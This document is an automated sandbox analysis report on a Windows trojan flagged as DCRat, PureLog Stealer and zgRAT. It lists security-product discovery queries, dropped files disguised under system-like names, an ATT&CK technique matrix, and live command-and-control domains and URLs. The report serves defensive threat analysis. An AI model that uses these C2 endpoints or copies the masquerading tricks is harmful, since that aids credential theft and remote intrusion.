Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1768667398.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9D7RwuJrth.exe PID: 3428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 3720, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9D7RwuJrth.exe, type: SAMPLE
Source: Yara match	File source: 0.0.9D7RwuJrth.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1727163824.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 9D7RwuJrth.exe, type: SAMPLE
Source: Yara match	File source: 0.0.9D7RwuJrth.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1768667398.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9D7RwuJrth.exe PID: 3428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 3720, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 9D7RwuJrth.exe, type: SAMPLE
Source: Yara match	File source: 0.0.9D7RwuJrth.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1727163824.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 9D7RwuJrth.exe, type: SAMPLE
Source: Yara match	File source: 0.0.9D7RwuJrth.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Windows Service	1 Windows Service	233 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	11 Process Injection	1 Modify Registry	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	151 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	34 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 File Deletion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9D7RwuJrth.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
9D7RwuJrth.exe	74%	Virustotal		Browse
9D7RwuJrth.exe	100%	Avira	TR/AVI.Agent.hjtmb
9D7RwuJrth.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	100%	Avira	TR/AVI.Agent.hjtmb
C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Avira	TR/AVI.Agent.hjtmb
C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Avira	TR/AVI.Agent.hjtmb
C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\CvcPWQun.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\user\Desktop\AEgOhmic.log	100%	Avira	TR/Agent.jbwuj
C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\BRrXbneT.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\COJNZQhv.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\grDS520PRI.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\ANxQZOiH.log	100%	Avira	TR/Agent.jbwuj
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Avira	TR/AVI.Agent.hjtmb
C:\Users\user\Desktop\CDLiAAVt.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\BjyqpIYV.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\CvcPWQun.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\CDLiAAVt.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CJLfMmRu.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AEgOhmic.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ANxQZOiH.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\AVufnTwx.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\AddxSDXD.log	17%	ReversingLabs
C:\Users\user\Desktop\BRrXbneT.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BjyqpIYV.log	8%	ReversingLabs
C:\Users\user\Desktop\BwryKsoE.log	24%	ReversingLabs
C:\Users\user\Desktop\CDLiAAVt.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CJLfMmRu.log	5%	ReversingLabs
C:\Users\user\Desktop\COJNZQhv.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CvcPWQun.log	8%	ReversingLabs
C:\Users\user\Desktop\DCtffNkc.log	8%	ReversingLabs
C:\Users\user\Desktop\DpMeoAtV.log	21%	ReversingLabs
C:\Users\user\Desktop\EvEoCbHu.log	8%	ReversingLabs
C:\Users\user\Desktop\FDIxLbbR.log	5%	ReversingLabs
C:\Users\user\Desktop\GQJohFLp.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GfifQgAx.log	8%	ReversingLabs
C:\Users\user\Desktop\HBUOKBdR.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\HENwTSHn.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HGufhKgM.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\HiuOyNKb.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HoTXnYtt.log	8%	ReversingLabs
C:\Users\user\Desktop\Hwddojgi.log	8%	ReversingLabs
C:\Users\user\Desktop\ITFobKbD.log	8%	ReversingLabs
C:\Users\user\Desktop\IonNSomK.log	8%	ReversingLabs
C:\Users\user\Desktop\IpLeIKzQ.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\JENuXwBf.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\JUqyElOI.log	17%	ReversingLabs
C:\Users\user\Desktop\JdPmuXvO.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JpYWvPZP.log	8%	ReversingLabs
C:\Users\user\Desktop\KMHfZCnD.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KSAetdQl.log	17%	ReversingLabs
C:\Users\user\Desktop\KebpbcGE.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KrawoXqF.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\LALnLPjB.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LsLFRydK.log	8%	ReversingLabs
C:\Users\user\Desktop\MFWOLyZB.log	24%	ReversingLabs
C:\Users\user\Desktop\MPcmOdeg.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\MbDxwcVz.log	8%	ReversingLabs
C:\Users\user\Desktop\MsfvwPWb.log	17%	ReversingLabs
C:\Users\user\Desktop\NZNelUXb.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NhwwQEyh.log	5%	ReversingLabs
C:\Users\user\Desktop\OIrVAZQe.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OLjDJquB.log	17%	ReversingLabs
C:\Users\user\Desktop\OPbwNHKO.log	21%	ReversingLabs
C:\Users\user\Desktop\OQhlWUKC.log	17%	ReversingLabs
C:\Users\user\Desktop\OdqVYMoD.log	5%	ReversingLabs
C:\Users\user\Desktop\OzPMecrY.log	8%	ReversingLabs
C:\Users\user\Desktop\QJwUIRwB.log	17%	ReversingLabs
C:\Users\user\Desktop\QLdDWJUZ.log	8%	ReversingLabs
C:\Users\user\Desktop\QfdDtvsy.log	8%	ReversingLabs
C:\Users\user\Desktop\QfjBlGMR.log	21%	ReversingLabs
C:\Users\user\Desktop\QnTUQpnW.log	24%	ReversingLabs
C:\Users\user\Desktop\RUOvtANV.log	8%	ReversingLabs
C:\Users\user\Desktop\RXHdCRrs.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RfxtYLmQ.log	8%	ReversingLabs
C:\Users\user\Desktop\RngMDvMV.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RoOvQmlu.log	8%	ReversingLabs
C:\Users\user\Desktop\SFRmUDLH.log	24%	ReversingLabs
C:\Users\user\Desktop\STgXZIan.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\SYsmfrex.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TMiCdAAw.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TcjfiIuK.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\TideCjWs.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\UAlWJNil.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\VBmvCWAb.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\VNPvpVFD.log	21%	ReversingLabs
C:\Users\user\Desktop\VfEmYjln.log	8%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
304773cm.n9shteam.in	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://304773cm.n9shteam.in	1%	Virustotal		Browse
http://304773cm.n9shteam.in/jscpuGamegeneratorprivate.php	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
304773cm.n9shteam.in	188.114.96.3	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://304773cm.n9shteam.in/jscpuGamegeneratorprivate.php	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://304773cm.n9sh	WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://304773cm.n9Pb	WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	9D7RwuJrth.exe, 00000000.00000002.1765297804.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.000000000340F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.000000000310B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003924000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://304773cm.n9shteam.in/jscpuGamegeneratorprivate.php0	WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://304773cm.n9shteam.in	WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.000000000340F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.000000000310B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.000000000393A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.0000000003A88000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003924000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000003191000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
http://304773cm.n9P	WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://304773cm.n9shteam.in/	WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	304773cm.n9shteam.in	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542977
Start date and time:	2024-10-27 02:41:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	73
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9D7RwuJrth.exe renamed because original name is a hash value
Original Sample Name:	0ad0b4a4a549230e090d712b5521bd96.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@90/227@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WmiPrvSE.exe, PID 3720 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 7420 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 7744 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:42:15	API Interceptor	9x Sleep call for process: WmiPrvSE.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	DBUfLVzZhf.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	R5AREmpD4S.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
	19387759999PO-RFQ-INVOICE-doc.exe	Get hash	malicious	FormBook	Browse	www.zonguldakescortg.xyz/483l/
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.fnsds.org/
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	104.20.41.119
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	8.44.59.50
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	https://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	SUNNY HONG VSL PARTICULARS.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	WINNING DILIGENCE - VESSEL PARTICULARS.doc.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AEgOhmic.log	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	12Vjq7Yv2E.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	7WyBcig6e3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kBY9lgRaca.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	lv961v43L3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	FMd6ntIhQY.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	5Aw2cV5m0c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Mozilla Maintenance Service\69ddcba757bf72

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (600), with no line terminators
Category:	dropped
Size (bytes):	600
Entropy (8bit):	5.908008984099054
Encrypted:	false
